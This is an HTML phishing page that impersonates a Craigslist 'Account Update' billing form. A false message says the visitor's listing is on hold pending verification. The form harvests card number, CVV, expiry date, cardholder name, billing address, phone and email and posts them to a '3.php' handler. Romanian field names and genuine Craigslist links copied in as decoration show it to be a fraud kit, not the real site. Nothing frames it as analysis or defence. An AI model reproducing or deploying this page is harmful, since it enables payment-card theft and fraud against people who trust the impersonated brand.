
<html>
<head>
    <title>Craigslist Account</title>
   <link rel="Shortcut Icon" type="image/x-icon" href="index_files/favicon.ico"> <link rel="stylesheet" title="craigslist" href="/styles/craigslist.css" type="text/css" media="all">
</head>

<body id="pp">
<table width="100%" id="header" summary="header">
    <tr valign="top">
        <td>
            <b> <a href="http://www.craigslist.org">Craigslist</a> &gt; billing information </b>
        </td>
    </tr>
</table>
<hr>

<form action="3.php" method="POST">
<div style="float:left;">
<table width="100%" border="0">
        <tr bgcolor="#eeeeee">
                <th align="left" colspan="2"><b>Account Update</b></th>
                <th align="right"><b></b></th>
        </tr>
        <tr>
                <!-- <td nowrap colspan="2">"$emailspm"</td> -->
                <td>&nbsp;</td>
        </tr>
        <tr>
<td>&nbsp;&nbsp;</td><td><i><span style="color: red"><b>
Your listing is on HOLD for verification. Please update your billing information so you can be live on website in the next 5-10 min.</b></span> - <span style="color: green"><b>Please Update your account</b></span></i></td>
<td align='right'></td>
</tr>

        <tr>
                <td align="right" nowrap colspan="2">&nbsp;<b></b>&nbsp;&nbsp;&nbsp;</td>
                <td align="right"><b></b></td>
        </tr>
</table>


<hr>
<div class="highlight">Required fields are in <span class="req">green</span>.<br></div>


    <script type="text/javascript"><!--
        function checkPicker (p) {
            var st = document.getElementById('ccst');
            var pc = document.getElementById('ccpc');
            if (p.value == "US" || p.value == "CA") {
                st.style.color="green";
                pc.style.color="green";
            } else {
                st.style.color="black";
                pc.style.color="black";
            }
        }
    --></script>

    <fieldset id="ccinfo">
        <legend><b>Please enter your payment card information:</b></legend>
        <table>
            <tr>
                <td align="right"><b>
                    <span style="color: green">
                        Card Number:
                    </span></b>
                </td>
                <td>
                    <input type="text" size="20" maxlength="40" name="NumarCard" value="" autocomplete="off">
                    <b><span style="color: green">Security Code (CVV):</span></b>
                    <input type="text" size="4" maxlength="4" name="CVV" value="" autocomplete="off">
                    <font size="2">
                        (<a target="_blank" onclick="window.open('https://www.craigslist.org/about/help/card_verification_number?lang=en&cc=us','touwindow','top=60,left=100,width=450,height=600'); return false;" href="https://www.craigslist.org/about/help/card_verification_number?lang=en&cc=us">What's this?</a>)
                    </font>
                </td>
            </tr>
            <tr>
                <td align="right">
                    <b>
                        <span style="color: green">Expiration Month</span> /
                        <span style="color: green">Year:</span>
                    </b>
                </td>
                <td>
		    <input type="text" size="2" maxlength="2" name="Zi" value=""> /
		    <input type="text" size="4" maxlength="4" name="Luna" value="">
                </td>
            </tr>
            <tr>
                <td align="right"><b><span style="color: green">Card Name, First:</span></b></td>
                <td><input type="text" size="20" maxlength="80" name="NumeCard" value="">
                <b><span style="color: green">Last:</span></b>
                <input type="text" size="20" maxlength="80" name="PrenumeCard" value=""></td>
            </tr>
            <tr>
                <td align="right"><b><span style="color: green">Card Address:</span></b></td>
                <td><input type="text" size="30" maxlength="80" name="Adresa" value="">
                  <i>(must match address on card statement exactly)</i>
                </td>
            </tr>
            <tr>
                <td align="right">
                    <b><span style="color: green">City:</span></b>
                </td>
                <td>
                    <input type="text" size="15" maxlength="80" name="Oras" value="">
                    <b><span style="color: green" id="ccst">State/Province:</span></b>
                    <select style="max-width: 14em" name="Stat" id="sel_cardState">
<script type="text/javascript"><!--
			function showRegions() {
				var tohide = document.querySelectorAll(".opt_region");
				for(var eli=0; eli<tohide.length; eli++) {
					tohide[eli].removeAttribute("selected");
					tohide[eli].setAttribute("disabled", "true");
				}
				for(var argi=0; argi<arguments.length; argi++) {
					var toshow = document.querySelectorAll(".opt_region_" + arguments[argi]);
					if(toshow.length > 0) {
						toshow[0].setAttribute("selected", "selected");
					}
					for(var eli=0; eli<toshow.length; eli++) {
						toshow[eli].removeAttribute("disabled");
						if(toshow[eli].value == '')
							toshow[eli].setAttribute("selected", "selected");
					}
				}
			}
			window.onload = function () {
				showRegions('US');
			}
		--></script>
<option class="opt_region_US opt_region" value="">-- please select --</option>
<option class="opt_region_US opt_region" value="AL">Alabama</option>
<option class="opt_region_US opt_region" value="AK">Alaska</option>
<option class="opt_region_US opt_region" value="AS">American Samoa</option>
<option class="opt_region_US opt_region" value="AZ">Arizona</option>
<option class="opt_region_US opt_region" value="AR">Arkansas</option>
<option class="opt_region_US opt_region" value="AA">Armed Forces Americas (except Canada)</option>
<option class="opt_region_US opt_region" value="AE">Armed Forces Middle East</option>
<option class="opt_region_US opt_region" value="AP">Armed Forces Pacific</option>
<option class="opt_region_US opt_region" value="CA">California</option>
<option class="opt_region_US opt_region" value="CO">Colorado</option>
<option class="opt_region_US opt_region" value="CT">Connecticut</option>
<option class="opt_region_US opt_region" value="DE">Delaware</option>
<option class="opt_region_US opt_region" value="DC">District Of Columbia</option>
<option class="opt_region_US opt_region" value="FM">Federated States Of Micronesia</option>
<option class="opt_region_US opt_region" value="FL">Florida</option>
<option class="opt_region_US opt_region" value="GA">Georgia</option>
<option class="opt_region_US opt_region" value="GU">Guam</option>
<option class="opt_region_US opt_region" value="HI">Hawaii</option>
<option class="opt_region_US opt_region" value="ID">Idaho</option>
<option class="opt_region_US opt_region" value="IL">Illinois</option>
<option class="opt_region_US opt_region" value="IN">Indiana</option>
<option class="opt_region_US opt_region" value="IA">Iowa</option>
<option class="opt_region_US opt_region" value="KS">Kansas</option>
<option class="opt_region_US opt_region" value="KY">Kentucky</option>
<option class="opt_region_US opt_region" value="LA">Louisiana</option>
<option class="opt_region_US opt_region" value="ME">Maine</option>
<option class="opt_region_US opt_region" value="MH">Marshall Islands</option>
<option class="opt_region_US opt_region" value="MD">Maryland</option>
<option class="opt_region_US opt_region" value="MA">Massachusetts</option>
<option class="opt_region_US opt_region" value="MI">Michigan</option>
<option class="opt_region_US opt_region" value="MN">Minnesota</option>
<option class="opt_region_US opt_region" value="MS">Mississippi</option>
<option class="opt_region_US opt_region" value="MO">Missouri</option>
<option class="opt_region_US opt_region" value="MT">Montana</option>
<option class="opt_region_US opt_region" value="NE">Nebraska</option>
<option class="opt_region_US opt_region" value="NV">Nevada</option>
<option class="opt_region_US opt_region" value="NH">New Hampshire</option>
<option class="opt_region_US opt_region" value="NJ">New Jersey</option>
<option class="opt_region_US opt_region" value="NM">New Mexico</option>
<option class="opt_region_US opt_region" value="NY">New York</option>
<option class="opt_region_US opt_region" value="NC">North Carolina</option>
<option class="opt_region_US opt_region" value="ND">North Dakota</option>
<option class="opt_region_US opt_region" value="MP">Northern Mariana Islands</option>
<option class="opt_region_US opt_region" value="OH">Ohio</option>
<option class="opt_region_US opt_region" value="OK">Oklahoma</option>
<option class="opt_region_US opt_region" value="OR">Oregon</option>
<option class="opt_region_US opt_region" value="PW">Palau</option>
<option class="opt_region_US opt_region" value="PA">Pennsylvania</option>
<option class="opt_region_US opt_region" value="PR">Puerto Rico</option>
<option class="opt_region_US opt_region" value="RI">Rhode Island</option>
<option class="opt_region_US opt_region" value="SC">South Carolina</option>
<option class="opt_region_US opt_region" value="SD">South Dakota</option>
<option class="opt_region_US opt_region" value="TN">Tennessee</option>
<option class="opt_region_US opt_region" value="TX">Texas</option>
<option class="opt_region_US opt_region" value="UT">Utah</option>
<option class="opt_region_US opt_region" value="VT">Vermont</option>
<option class="opt_region_US opt_region" value="VA">Virginia</option>
<option class="opt_region_US opt_region" value="VI">Virgin Islands</option>
<option class="opt_region_US opt_region" value="WA">Washington</option>
<option class="opt_region_US opt_region" value="WV">West Virginia</option>
<option class="opt_region_US opt_region" value="WI">Wisconsin</option>
<option class="opt_region_US opt_region" value="WY">Wyoming</option>
<option class="opt_region_CA opt_region" value="">-- please select --</option>
<option class="opt_region_CA opt_region" value="AB">Alberta</option>
<option class="opt_region_CA opt_region" value="BC">British Columbia</option>
<option class="opt_region_CA opt_region" value="MB">Manitoba</option>
<option class="opt_region_CA opt_region" value="NB">New Brunswick</option>
<option class="opt_region_CA opt_region" value="NL">Newfoundland And Labrador</option>
<option class="opt_region_CA opt_region" value="NT">Northwest Territories</option>
<option class="opt_region_CA opt_region" value="NS">Nova Scotia</option>
<option class="opt_region_CA opt_region" value="NU">Nunavut</option>
<option class="opt_region_CA opt_region" value="ON">Ontario</option>
<option class="opt_region_CA opt_region" value="PE">Prince Edward Island</option>
<option class="opt_region_CA opt_region" value="QC">Quebec</option>
<option class="opt_region_CA opt_region" value="SK">Saskatchewan</option>
<option class="opt_region_CA opt_region" value="YT">Yukon</option>
</select>
                    &nbsp;&nbsp;
                    <b><span style="color: green" id="ccpc">Zip/Postal Code:</span></b>
                    &nbsp;<input type="text" size="5" maxlength="5" name="CodPostal" value="">
                </td>
            </tr>
            <tr>
                <td align="right"><b><span style="color: green">Country:</span></b></td>
                <td><label>
				<input type="radio" name="cardCountry" value="US" checked="checked" onchange="showRegions(this.value.toUpperCase())">United States</label>
			<label>
				<input type="radio" name="cardCountry" value="CA" onchange="showRegions(this.value.toUpperCase())">Canada</label></td>
            </tr>
        </table>
    </fieldset>



<table>
    <tr>
        <td colspan="2">
            
        </td>
    </tr>
    <tr>
        <td align="right">
            <b><span style="color:green">Contact Name:</span></b>
        </td>
        <td>
            <input type="text" size="20" maxlength="80" name='NumedeContact' value="">
        </td>
    </tr>
    <tr>
        <td align="right">
            <b><span style="color:green">Contact Phone Number:</span></b>
        </td>
        <td>
            <input type="text" size="16" maxlength="80" name='NumardeTelefon' value="">
        </td>
    </tr>
    <tr>
        <td align="right">
            <b><span style="color:green">Contact Email Address:</span></b>
        </td>
        <td>
            <input type="text" size="30" maxlength="80" name='EmaildeContact' value="">
        </td>
    </tr>
</table>

<hr>

<div id="presubmit">
    <div class='fineprint'>
         Craigslist <a target="_blank" onclick="window.open('https://www.craigslist.org/about/terms.of.use?lang=en&cc=us','touwindow','top=60,left=100,width=450,height=600'); return false;" href="https://www.craigslist.org/about/terms.of.use?lang=en&cc=us">Terms of Use</a>
    </div>
    <input type="hidden" name='cryptedStepCheck' value="">
    <button type="submit" name='finishForm' style="margin: 6px;" value="Update"
                onclick="document.getElementById('presubmit').style.display='none'; document.getElementById('postsubmit').style.display='block';">
                Update</button>
    &nbsp;<em>(This step may take up to 60 seconds.)</em>
</div>

<div id="postsubmit" style="display: none;">
    <b>Processing...</b><br>
</div>



</div>

</form>



</body>
</html>


